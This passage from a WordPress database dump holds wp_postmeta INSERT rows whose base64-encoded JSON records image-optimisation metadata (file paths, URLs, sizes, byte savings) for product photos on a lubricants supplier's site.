vcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQwNywiaWQiOjE2NjF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDEwLCJpZCI6MTY2MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0MTIsImlkIjoxNjYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDE1LCJpZCI6MTY2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQxNywiaWQiOjE2NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjAwLWFlcm9zb2wta3J5dG94LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIwMC1hZXJvc29sLWtyeXRveC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMDAtYWVyb3NvbC1rcnl0b3gtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0MjAsImlkIjoxNjYxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29346, 1660, 'wpfc_optimisation_reduction', '2407572'); 
INSERT INTO `wp_postmeta` VALUES (29347, 1660, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwuanBnIiwid2lkdGgiOjI4NTAsImhlaWdodCI6MTg4NywibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwuanBnIiwicmVkdWN0aW9uIjoyNDA3NTYxLCJ0aW1lIjoxNDgzNTY3NDMxLCJpZCI6IjE2NjAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQzNCwiaWQiOjE2NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTgwMHg1MzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDM3LCJpZCI6MTY2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTc2OHg1MDguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC03Njh4NTA4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtNzY4eDUwOC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0NDAsImlkIjoxNjYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMTYwMHgxMDU5LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0xNjAweDEwNTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0xNjAweDEwNTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDQ0LCJpZCI6MTY2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0NDYsImlkIjoxNjYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQ0OSwiaWQiOjE2NjB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDUxLCJpZCI6MTY2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0NTQsImlkIjoxNjYwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDU2LCJpZCI6MTY2MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQ1OSwiaWQiOjE2NjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1pbmR1c3RyaWFsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaW5kdXN0cmlhbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWluZHVzdHJpYWwtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0NjEsImlkIjoxNjYwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29348, 1659, 'wpfc_optimisation_reduction', '974763'); 
INSERT INTO `wp_postmeta` VALUES (29349, 1659, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS5qcGciLCJ3aWR0aCI6MjQ3NSwiaGVpZ2h0IjoxNjUwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjo5NzQ3NTIsInRpbWUiOjE0ODM1Njc0NzEsImlkIjoiMTY1OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDc0LCJpZCI6MTY1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0NzYsImlkIjoxNjU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQ3OSwiaWQiOjE2NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njc0ODIsImlkIjoxNjU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzQ4NSwiaWQiOjE2NTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaGlnaC10ZW1wZXJhdHVyZS1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oaWdoLXRlbXBlcmF0dXJlLWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWhpZ2gtdGVtcGVyYXR1cmUtZ3JlYXNlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3NDg3LCJpZCI6MTY1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWN